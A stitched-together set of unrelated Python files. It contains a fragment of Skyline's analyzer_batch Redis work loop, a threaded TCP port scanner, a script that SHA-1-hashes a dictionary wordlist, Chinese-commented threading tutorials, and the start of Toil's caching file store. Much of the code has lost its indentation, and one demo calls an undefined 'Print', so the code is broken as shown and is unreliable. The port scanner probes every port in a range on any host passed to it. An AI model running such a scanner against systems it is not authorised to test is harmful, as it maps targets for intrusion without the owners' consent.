(cache_key, str(cache_key_value)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s, %s]' %
(cache_key, str(datapoint), base_name,
str(int(metric_timestamp)),
str(triggered_algorithms),
str(algorithms_run)))
# It could have been deleted by the Roomba
except TypeError:
# @added 20200430 - Feature #3480: batch_processing
# Added logging here as the DeletedByRoomba exception is
# generally not related to that but related to some other failure
# in the processing of the run algorithms phase
logger.error(traceback.format_exc())
logger.error('error :: added as DeletedByRoomba but possibly not, see traceback above')
exceptions['DeletedByRoomba'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Handle analyzer_batch work being added over and over every
# minute by also updating the last_timestamp key if stale,
# boring, etc
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(time())
self.redis_conn.setex(
last_metric_timestamp_key, 2592000, int_metric_timestamp)
logger.info('set Redis key %s to %s, even though it has been deleted by Roomba' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it has been deleted by Roomba' % last_metric_timestamp_key)
except TooShort:
exceptions['TooShort'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is too short' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is too short' % last_metric_timestamp_key)
except Stale:
exceptions['Stale'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is stale' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is stale' % last_metric_timestamp_key)
except Boring:
exceptions['Boring'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is boring' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is boring' % last_metric_timestamp_key)
except:
logger.error(traceback.format_exc())
logger.error('error - Other error reported')
exceptions['Other'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(time())
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
logger.error('error :: set Redis key %s to %s, even though another error has been thrown' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, when other exception was thrown' % last_metric_timestamp_key)
# Remove from work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
try:
del timeseries
except:
pass
try:
del timestamps_to_analyse
except:
pass
try:
del batch_timeseries
except:
pass
if not batch_mode:
try:
del mirage_unique_metrics
except:
pass
try:
del ionosphere_unique_metrics
except:
pass
try:
del derivative_metrics
except:
pass
try:
del non_derivative_metrics
except:
pass
try:
del non_derivative_monotonic_metrics
except:
pass
try:
del non_smtp_alerter_metrics
except:
pass
# Add values to the queue so the parent process can collate
for key, value in anomaly_breakdown.items():
self.batch_anomaly_breakdown_q.put((key, value))
for key, value in exceptions.items():
self.batch_exceptions_q.put((key, value))
spin_end = time() - spin_start
logger.info('spin_batch_process took %.2f seconds' % spin_end)
return
def run(self):
"""
- Called when the process initializes.
- Determine if Redis is up and discover the number of `unique metrics`.
- Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
and assign each process a set of metrics to analyse for anomalies.
- Wait for the processes to finish.
- Determine if any anomalous metrics require:
- Alerting on (and set `EXPIRATION_TIME` key in Redis for alert).
- Feed to another module e.g. mirage.
- Alert to syslog.
- Populate the webapp json with the anomalous_metrics details.
- Log the details about the run to the skyline analyzer log.
- Send skyline.analyzer metrics to `GRAPHITE_HOST`
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @added 20190417 - Feature #2950: Report defaulted settings to log
# Added all the globally declared settings to enable reporting in the
# log the state of each setting.
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
logger.info('SERVER_METRIC_PATH is set from settings.py to %s' % str(SERVER_METRIC_PATH))
except:
SERVER_METRIC_PATH = ''
logger.info('warning :: SERVER_METRIC_PATH is not declared in settings.py, defaults to \'\'')
logger.info('skyline_app_graphite_namespace is set to %s' % str(skyline_app_graphite_namespace))
try:
ANALYZER_ENABLED = settings.ANALYZER_ENABLED
logger.info('ANALYZER_ENABLED is set to %s' % str(ANALYZER_ENABLED))
except:
ANALYZER_ENABLED = True
logger.info('warning :: ANALYZER_ENABLED is not declared in settings.py, defaults to True')
if not os.path.exists(settings.SKYLINE_TMP_DIR):
# @modified 20160803 - Adding additional exception handling to Analyzer
try:
mkdir_p(settings.SKYLINE_TMP_DIR)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s' % settings.SKYLINE_TMP_DIR)
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
try:
self.redis_conn = get_redis_conn(skyline_app)
except:
logger.error(traceback.format_exc())
# logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
logger.error('error :: Analyzer cannot connect to get_redis_conn')
continue
try:
self.redis_conn_decoded.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer batch cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
try:
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except:
logger.error(traceback.format_exc())
# logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
logger.error('error :: Analyzer batch cannot connect to get_redis_conn')
continue
"""
Determine if any metric has been added to process
"""
while True:
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, int(now))
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer batch could not update the Redis %s key' % skyline_app)
# Discover metrics to analyze
analyzer_batch_work = None
redis_set = 'analyzer.batch'
try:
analyzer_batch_work = self.redis_conn_decoded.smembers(redis_set)
except Exception as e:
logger.error('error :: could not query Redis for set %s - %s' % (redis_set, e))
if analyzer_batch_work:
analyzer_batch_work_queue_items = len(analyzer_batch_work)
if analyzer_batch_work_queue_items > 0:
logger.info('there are %s metrics to process in the %s Redis set' % (
str(analyzer_batch_work_queue_items), redis_set))
break
else:
logger.info('there are no batch metrics to process')
sleep(1)
metric_name = None
last_analyzed_timestamp = None
for index, analyzer_batch in enumerate(analyzer_batch_work):
try:
batch_processing_metric = literal_eval(analyzer_batch)
metric_name = str(batch_processing_metric[0])
last_analyzed_timestamp = int(batch_processing_metric[1])
break
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from analyzer_batch entry')
metric_name = None
last_analyzed_timestamp = None
batch_processing_metric = None
sleep(1)
# @added 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# If multiple work items exist sort them by oldest timestamp and
# process the item with the oldest timestamp first
if analyzer_batch_work:
unsorted_analyzer_batch_work = []
for index, analyzer_batch in enumerate(analyzer_batch_work):
try:
batch_processing_metric = literal_eval(analyzer_batch)
metric_name = str(batch_processing_metric[0])
last_analyzed_timestamp = int(batch_processing_metric[1])
unsorted_analyzer_batch_work.append([metric_name, last_analyzed_timestamp])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from analyzer_batch entry')
sorted_analyzer_batch_work = sorted(unsorted_analyzer_batch_work, key=lambda x: x[1])
logger.info('there are %s work items in the sorted_analyzer_batch_work list' % (str(len(sorted_analyzer_batch_work))))
# @added 20201017 - Feature #3818: ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
# Remove multiple entries for metrics and only add the latest
# timestamp item per metric
original_work_queue_length = len(sorted_analyzer_batch_work)
metrics = list(set([item[0] for item in sorted_analyzer_batch_work]))
logger.info('there are %s unique metrics with work items in the sorted_analyzer_batch_work list' % (str(len(metrics))))
if len(metrics) < original_work_queue_length:
new_analyzer_batch_work = []
for metric in metrics:
work_timestamps = []
for item in sorted_analyzer_batch_work:
if item[0] == metric:
timestamp = item[1]
work_timestamps.append(timestamp)
new_analyzer_batch_work.append([metric, timestamp])
if len(work_timestamps) > 1:
last_work_timestamp = work_timestamps[-1]
for work_timestamp in work_timestamps:
if work_timestamp != last_work_timestamp:
# Remove from work list
redis_set = 'analyzer.batch'
data = [metric, int(work_timestamp)]
try:
self.redis_conn.srem('analyzer.batch', str(data))
logger.info('analyzer_batch :: newer work exists, removed older work item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove older work item - %s - from Redis set - %s' % (str(data), redis_set))
sorted_analyzer_batch_work = sorted(new_analyzer_batch_work, key=lambda x: x[1])
new_work_queue_length = len(sorted_analyzer_batch_work)
if original_work_queue_length != new_work_queue_length:
pruned_item_count = original_work_queue_length - new_work_queue_length
logger.info('the analyzer.batch Redis set was pruned of %s older items which have newer work items' % str(pruned_item_count))
metric_name = str(sorted_analyzer_batch_work[0][0])
last_analyzed_timestamp = int(sorted_analyzer_batch_work[0][1])
batch_processing_metric = [metric_name, last_analyzed_timestamp]
if not metric_name:
break
# @added 20200904 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Task #3730: Validate Mirage running multiple processes
# Remove any existing algorithm.error and timing files from any
# previous runs
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old error file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('error :: failed to cleanup algorithm.error files')
logger.info(traceback.format_exc())
pattern = '%s.*.algorithm.timings' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old timings file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('error :: failed to cleanup algorithm.timing files')
logger.info(traceback.format_exc())
logger.info('processing - %s' % str(batch_processing_metric))
# Spawn processes
batch_pids = []
spawned_batch_pids = []
batch_pid_count = 0
run_timestamp = now
for i in range(1, 2):
if BATCH_MODE:
batch_p = Process(target=self.spin_batch_process, args=(i, run_timestamp, 'batch_mode', 0, sorted_analyzer_batch_work[0:300]))
else:
batch_p = Process(target=self.spin_batch_process, args=(i, run_timestamp, metric_name, last_analyzed_timestamp))
batch_pids.append(batch_p)
batch_pid_count += 1
logger.info('starting 1 of %s spin_batch_process' % (str(batch_pid_count)))
batch_p.start()
spawned_batch_pids.append(batch_p.pid)
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_batch_process
# that has run for longer than 300 seconds
p_starts = time()
while time() - p_starts <= 300:
if any(p.is_alive() for p in batch_pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('1 spin_batch_process completed in %.2f seconds' % (time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all spin_batch_process processes')
for p in batch_pids:
p.terminate()
# p.join()
for p in batch_pids:
if p.is_alive():
                    logger.info('stopping spin_batch_process - %s' % (str(p.is_alive())))
p.join()
# Grab data from the queue and populate dictionaries
exceptions = dict()
anomaly_breakdown = dict()
while 1:
try:
key, value = self.batch_anomaly_breakdown_q.get_nowait()
if key not in anomaly_breakdown.keys():
anomaly_breakdown[key] = value
else:
anomaly_breakdown[key] += value
except Empty:
break
while 1:
try:
key, value = self.batch_exceptions_q.get_nowait()
if key not in exceptions.keys():
exceptions[key] = value
else:
exceptions[key] += value
except Empty:
break
# @added 20200904 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Task #3730: Validate Mirage running multiple processes
# Report any algorithm errors
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
algorithm_error_file = os.path.join(settings.SKYLINE_TMP_DIR, f)
if os.path.isfile(algorithm_error_file):
logger.error('error :: error reported in %s' % (
algorithm_error_file))
try:
with open(algorithm_error_file, 'r') as f:
error_string = f.read()
logger.error('%s' % str(error_string))
except:
logger.error('error :: failed to read error file - %s' % algorithm_error_file)
try:
os.remove(algorithm_error_file)
except OSError:
pass
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check algorithm errors')
# @added 20191021 - Bug #3288: Always send anomaly_breakdown and exception metrics
# Branch #3262: py3
exceptions_metrics = ['Boring', 'Stale', 'TooShort', 'Other']
try:
for i_exception in exceptions_metrics:
if i_exception not in exceptions.keys():
exceptions[i_exception] = 0
# @added 20200607 - Feature #3566: custom_algorithms
anomaly_breakdown_algorithms = list(settings.ALGORITHMS)
if CUSTOM_ALGORITHMS:
for custom_algorithm in settings.CUSTOM_ALGORITHMS:
anomaly_breakdown_algorithms.append(custom_algorithm)
# @modified 20200607 - Feature #3566: custom_algorithms
# for i_anomaly_breakdown in settings.ALGORITHMS:
for i_anomaly_breakdown in anomaly_breakdown_algorithms:
if i_anomaly_breakdown not in anomaly_breakdown.keys():
anomaly_breakdown[i_anomaly_breakdown] = 0
exceptions_string = ''
for i_exception in exceptions.keys():
if exceptions_string == '':
exceptions_string = '%s: %s' % (str(i_exception), str(exceptions[i_exception]))
else:
exceptions_string = '%s, %s: %s' % (exceptions_string, str(i_exception), str(exceptions[i_exception]))
logger.info('exceptions - %s' % str(exceptions_string))
anomaly_breakdown_string = ''
if anomaly_breakdown:
for i_anomaly_breakdown in anomaly_breakdown.keys():
if anomaly_breakdown_string == '':
anomaly_breakdown_string = '%s: %s' % (str(i_anomaly_breakdown), str(anomaly_breakdown[i_anomaly_breakdown]))
else:
anomaly_breakdown_string = '%s, %s: %s' % (anomaly_breakdown_string, str(i_anomaly_breakdown), str(anomaly_breakdown[i_anomaly_breakdown]))
logger.info('anomaly_breakdown - %s' % str(anomaly_breakdown_string))
else:
logger.info('anomaly_breakdown - none, no anomalies')
except:
logger.error(traceback.format_exc())
                logger.error('error :: could not report exceptions and anomaly_breakdown details')
try:
del exceptions
except:
pass
try:
del anomaly_breakdown
except:
pass
try:
with self.batch_exceptions_q.mutex:
self.batch_exceptions_q.queue.clear()
except:
pass
try:
with self.batch_anomaly_breakdown_q.mutex:
self.batch_anomaly_breakdown_q.queue.clear()
except:
pass
|
port_scanner.py
|
import threading, socket, sys
from queue import Queue
user_inputs = sys.argv  # sys.argv is a list of strings
print_lock = threading.Lock()
# Can be a domain name or an IP address
# Note: user_inputs[0] is the script's path, so it is not needed
target = user_inputs[1]
q = Queue()
def portscan(port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect() returns None, so close the socket object itself on success
        s.connect((target, port))
        with print_lock:
            print('Port', port, 'is open!')
        s.close()
    except:
        pass
for port in range(int(user_inputs[2]), int(user_inputs[3])):
q.put(port)
def threader():
while True:
getting_port = q.get()
portscan(getting_port)
q.task_done()
for x in range(int(user_inputs[4])-1):
t = threading.Thread(target=threader, args=())
t.daemon = True
t.start()
print("\n******** You have ", threading.active_count(), "Running threads ***********\n")
q.join()
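# Usage sketch (argument order inferred from the sys.argv indexing above; the
# host and numbers below are placeholders):
#
#     python port_scanner.py 127.0.0.1 1 1024 50
#
# i.e. <target> <start_port> <end_port> <thread_count>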
|
no_thread.py
|
from time import time, ctime
import hashlib
import threading
def main():
    with open("smalldict.txt", "r") as f:
        words = f.readlines()
    with open("sha_1_no.txt", "a") as s:
        start_time = time()
        workers = []
        for i in words:
            word = i.strip("\n")
            t = threading.Thread(target=hash_word, args=(s, word))
            t.start()
            workers.append(t)
        # Wait for every thread to finish before the output file is closed
        for t in workers:
            t.join()
        print("finished in " + str(time() - start_time))
def hash_word(s, word):
    # sha1() requires bytes, so the word is encoded first
    s.write(hashlib.sha1(word.encode("utf-8")).hexdigest() + "\n")
if __name__ == "__main__":
    main()
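# Usage sketch: the script expects a wordlist named smalldict.txt in the
# working directory and appends one SHA-1 hex digest per word to sha_1_no.txt:
#
#     python no_thread.py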
|
util_threading.py
|
# coding: UTF-8
import threading
import _thread  # kept for compatibility with Python 2-style threading
import time
import queue
# Define a function to be run by the threads
def print_time(thread_name, delay, counter):
while counter:
time.sleep(delay)
print("%s: %s" % (thread_name, time.ctime(time.time())))
counter -= 1
def print_time_return(thread_name, delay, counter):
rtn = []
while counter:
time.sleep(delay)
rtn.append((thread_name, time.ctime(time.time())))
print("%s: %s" % (thread_name, time.ctime(time.time())))
counter -= 1
return rtn
# Subclass threading.Thread: instantiate it, then call start() to launch a new thread, which invokes the thread's run() method; the advantage is that run() can be overridden freely
class MyThread (threading.Thread):
def __init__(self, thread_id, name, delay, counter):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.delay = delay
self.counter = counter
def run(self):
print("开始线程:" + self.name)
# # 获取锁,锁住后其他进程将暂停直到该线程释放
# threadLock.acquire()
print_time(self.name, self.delay, self.counter)
print("退出线程:" + self.name)
# # 释放锁,开启下一个线程
# threadLock.release()
threadLock = threading.Lock()
class MyThreadQ (threading.Thread):
def __init__(self, threadID, name, q):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.q = q
def run(self):
print("开启线程:" + self.name)
process_data(self.name, self.q)
print("退出线程:" + self.name)
def process_data(threadName, q):
while not exitFlag:
queueLock.acquire()
if not workQueue.empty():
data = q.get()
queueLock.release()
print("%s processing %s" % (threadName, data))
else:
queueLock.release()
time.sleep(1)
exitFlag = 0
workQueue = queue.Queue(10)
queueLock = threading.Lock()
# Create two threads
try:
# ============================================================
    # # Start threads directly
    # # Main thread note: if the main thread ends, all child threads end with it, whether or not they have finished
# # _thread.start_new_thread(print_time, ("Thread-1", 1, 3)) # Py2.0
# # _thread.start_new_thread(print_time, ("Thread-2", 2, 3))
# thread1 = threading.Thread(target=print_time, args=("Thread-1", 1, 3)) # py3.0
# thread2 = threading.Thread(target=print_time, args=("Thread-2", 2, 3))
# thread1.start()
# thread2.start()
threads = []
thread1 = threading.Thread(target=print_time_return, args=("Thread-1", 1, 3)) # py3.0
thread2 = threading.Thread(target=print_time_return, args=("Thread-2", 2, 3))
thread1.start()
thread2.start()
ccc = 10
while ccc > 0:
time.sleep(1)
        print(thread1.is_alive(), thread2.is_alive())
ccc -= 1
# ============================================================
    # # Create threads via the Thread subclass
# thread1 = MyThread(1, "Thread-A", 1, 3)
# thread2 = MyThread(2, "Thread-B", 2, 3)
#
# list_tsk = []
# list_tsk.append(thread1)
# list_tsk.append(thread2)
#
# # for tsk in list_tsk:
    # # # Start the thread
    # # tsk.start()
    # # tsk.join()  # after join(), later code waits until this thread finishes; threads already started are unaffected
#
    # # Comparison of join() call ordering:
# for tsk in list_tsk:
    # # Start the thread
# tsk.start()
#
# # for tsk in list_tsk:
    # # tsk.join()  # blocks until the thread finishes before later code runs; join() accepts an optional timeout in seconds
#
# ccc = 10
# while ccc > 0:
# time.sleep(1)
# print(thread1.isAlive(), thread2.isAlive())
# ccc -= 1
# ============================================================
# thread_ist = ["Thread-1", "Thread-2", "Thread-3"]
# name_list = ["One", "Two", "Three", "Four", "Five"]
# threads = []
# thread_id = 1
#
    # # Create the new threads
# for tName in thread_ist:
# thread = MyThreadQ(thread_id, tName, workQueue)
# thread.start()
# threads.append(thread)
# thread_id += 1
#
    # # Fill the queue
# queueLock.acquire()
# for word in name_list:
# workQueue.put(word)
# queueLock.release()
#
    # # Wait for the queue to empty
# while not workQueue.empty():
# pass
#
    # # Notify the threads that it is time to exit
# exitFlag = 1
#
    # # Wait for all threads to finish
# for t in threads:
# t.join()
# ============================================================
print("我是后续代码")
except:
print("Error: 无法启动线程")
# -*- coding: UTF-8 -*-
# Demonstrates how shared data is modified with and without a lock
import threading
import time
list = [0,0,0,0,0,0,0,0,0,0,0,0]
class myThread(threading.Thread):
def __init__(self,threadId,name,counter):
threading.Thread.__init__(self)
self.threadId = threadId
self.name = name
self.counter = counter
def run(self):
print("开始线程:",self.name)
# 获得锁,成功获得锁定后返回 True
# 可选的timeout参数不填时将一直阻塞直到获得锁定
# 否则超时后将返回 False
threadLock.acquire()
print_time(self.name,self.counter,list.__len__())
# 释放锁
threadLock.release()
def __del__(self):
print(self.name,"线程结束!")
def print_time(threadName,delay,counter):
while counter:
time.sleep(delay)
list[counter-1] += 1
print("[%s] %s 修改第 %d 个值,修改后值为:%d" % (time.ctime(time.time()),threadName,counter,list[counter-1]))
counter -= 1
threadLock = threading.Lock()
threads = []
# Create the new threads
thread1 = myThread(1,"Thread-1",1)
thread2 = myThread(2,"Thread-2",2)
# Start the new threads
thread1.start()
thread2.start()
# Add the threads to the thread list
threads.append(thread1)
threads.append(thread2)
# Wait for all threads to finish
for t in threads:
t.join()
print("主进程结束!")
#!/usr/bin/python3
import time
import threading
import sys
import queue
q = queue.Queue()
def worker1(x, y):
func_name = sys._getframe().f_code.co_name
print("%s run ..." % func_name)
q.put((x + y, func_name))
def worker2(x, y):
func_name = sys._getframe().f_code.co_name
print("%s run ...." % func_name)
q.put((x - y, func_name))
if __name__ == '__main__':
result = list()
t1 = threading.Thread(target=worker1, name='thread1', args=(10, 5, ))
t2 = threading.Thread(target=worker2, name='thread2', args=(20, 1, ))
print('-' * 50)
t1.start()
t2.start()
t1.join()
t2.join()
while not q.empty():
result.append(q.get())
print(result)
for item in result:
if item[1] == worker1.__name__:
print("%s 's return value is : %s" % (item[1], item[0]))
elif item[1] == worker2.__name__:
print("%s 's return value is : %s" % (item[1], item[0]))
#!/usr/bin/python3
import threading
import time
# MyThread.py thread class
class MyThread(threading.Thread):
def __init__(self, func, args=()):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
        threading.Thread.join(self)  # wait for the thread to finish
try:
return self.result
except Exception:
return None
def add():
sumup = 0
for iii in range(5):
sumup+=1
# print(sumup)
time.sleep(1)
return sumup
if __name__=="__main__":
thrds = []
# 创建4个线程
for i in range(3):
task = MyThread(add, )
thrds.append(task)
#
# for thrd in thrds:
# print(thrd.get_result())
|
multiThreading.py
|
from time import sleep
from threading import Thread
class Hello(Thread):
    def run(self):
        for i in range(5):
            print("Hello")
            sleep(1)
class Hi(Thread):
    def run(self):
        for i in range(5):
            print("Hi")
            sleep(1)
hello = Hello()
hi = Hi()
hello.start()
sleep(0.2)
hi.start()
hello.join()
hi.join()
print("Bye")
print("Bye2")
# MULTI THREADING WITHOUT USING CLASSES
def hello():
for i in range(5):
Print("Hello")
def hi():
for i in range(5):
print("Hi")
t1 = Thread(target= hello)
t2 = Thread(target= hi)
t1.start()
t2.start()
t1.join()
t2.join()
print("Bye")
|
cachingFileStore.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
import errno
import hashlib
import logging
import os
import re
import shutil
import sqlite3
import sys
import tempfile
import threading
import time
import uuid
from toil.common import cacheDirName, getDirSizeRecursively, getFileSystemSize
from toil.lib.bioio import makePublicDir
from toil.lib.humanize import bytes2human
from toil.lib.misc import robust_rmtree, atomic_copy, atomic_copyobj
from toil.lib.retry import retry, ErrorCondition
from toil.lib.threading import get_process_name, process_name_exists
from toil.fileStores.abstractFileStore import AbstractFileStore
from toil.fileStores import FileID
logger = logging.getLogger(__name__)
# Use longer timeout to avoid hitting 'database is locked' errors.
SQLITE_TIMEOUT_SECS = 60.0
class CacheError(Exception):
"""
    Error raised if the user attempts to add a non-local file to the cache
"""
def __init__(self, message):
super(CacheError, self).__init__(message)
class CacheUnbalancedError(CacheError):
"""
Raised if file store can't free enough space for caching
"""
    message = 'Unable to free enough space for caching. This error frequently arises due ' \
'to jobs using more disk than they have requested. Turn on debug logging to see ' \
'more information leading up to this error through cache usage logs.'
def __init__(self):
super(CacheUnbalancedError, self).__init__(self.message)
class IllegalDeletionCacheError(CacheError):
"""
    Error raised if the caching code discovers that a file representing a
    reference to a cached file has gone missing.
This can be a big problem if a hard link is moved, because then the cache
will be unable to evict the file it links to.
Remember that files read with readGlobalFile may not be deleted by the user
and need to be deleted with deleteLocalFile.
"""
def __init__(self, deletedFile):
message = 'Cache tracked file (%s) has been deleted or moved by user ' \
                  'without updating cache database. Use deleteLocalFile to ' \
'delete such files.' % deletedFile
super(IllegalDeletionCacheError, self).__init__(message)
class InvalidSourceCacheError(CacheError):
"""
Error raised if the user attempts to add a non-local file to cache
"""
def __init__(self, message):
super(InvalidSourceCacheError, self).__init__(message)
class CachingFileStore(AbstractFileStore):
"""
A cache-enabled file store.
Provides files that are read out as symlinks or hard links into a cache
directory for the node, if permitted by the workflow.
Also attempts to write files back to the backing JobStore asynchronously,
after quickly taking them into the cache. Writes are only required to
finish when the job's actual state after running is committed back to the
job store.
    Internally, manages caching using a database. Each node has its own
database, shared between all the workers on the node. The database contains
several tables:
files contains one entry for each file in the cache. Each entry knows the
path to its data on disk. It also knows its global file ID, its state, and
its owning worker PID. If the owning worker dies, another worker will pick
it up. It also knows its size.
File states are:
- "cached": happily stored in the cache. Reads can happen immediately.
Owner is null. May be adopted and moved to state "deleting" by anyone, if
it has no outstanding immutable references.
- "downloading": in the process of being saved to the cache by a non-null
owner. Reads must wait for the state to become "cached". If the worker
dies, goes to state "deleting", because we don't know if it was fully
downloaded or if anyone still needs it. No references can be created to a
"downloading" file except by the worker responsible for downloading it.
- "uploadable": stored in the cache and ready to be written to the job
store by a non-null owner. Transitions to "uploading" when a (thread of)
the owning worker process picks it up and begins uploading it, to free
cache space or to commit a completed job. If the worker dies, goes to
state "cached", because it may have outstanding immutable references from
the dead-but-not-cleaned-up job that was going to write it.
- "uploading": stored in the cache and being written to the job store by a
non-null owner. Transitions to "cached" when successfully uploaded. If
the worker dies, goes to state "cached", because it may have outstanding
immutable references from the dead-but-not-cleaned-up job that was
writing it.
- "deleting": in the process of being removed from the cache by a non-null
owner. Will eventually be removed from the database.
refs contains one entry for each outstanding reference to a cached file
(hard link, symlink, or full copy). The table name is refs instead of
references because references is an SQL reserved word. It remembers what
job ID has the reference, and the path the reference is at. References have
three states:
- "immutable": represents a hardlink or symlink to a file in the cache.
Dedicates the file's size in bytes of the job's disk requirement to the
cache, to be used to cache this file or to keep around other files
without references. May be upgraded to "copying" if the link can't
actually be created.
- "copying": records that a file in the cache is in the process of being
copied to a path. Will be upgraded to a mutable reference eventually.
- "mutable": records that a file from the cache was copied to a certain
path. Exist only to support deleteLocalFile's API. Only files with only
mutable references (or no references) are eligible for eviction.
jobs contains one entry for each job currently running. It keeps track of
the job's ID, the worker that is supposed to be running the job, the job's
disk requirement, and the job's local temp dir path that will need to be
cleaned up. When workers check for jobs whose workers have died, they null
out the old worker, and grab ownership of and clean up jobs and their
references until the null-worker jobs are gone.
properties contains key, value pairs for tracking total space available,
and whether caching is free for this run.
"""
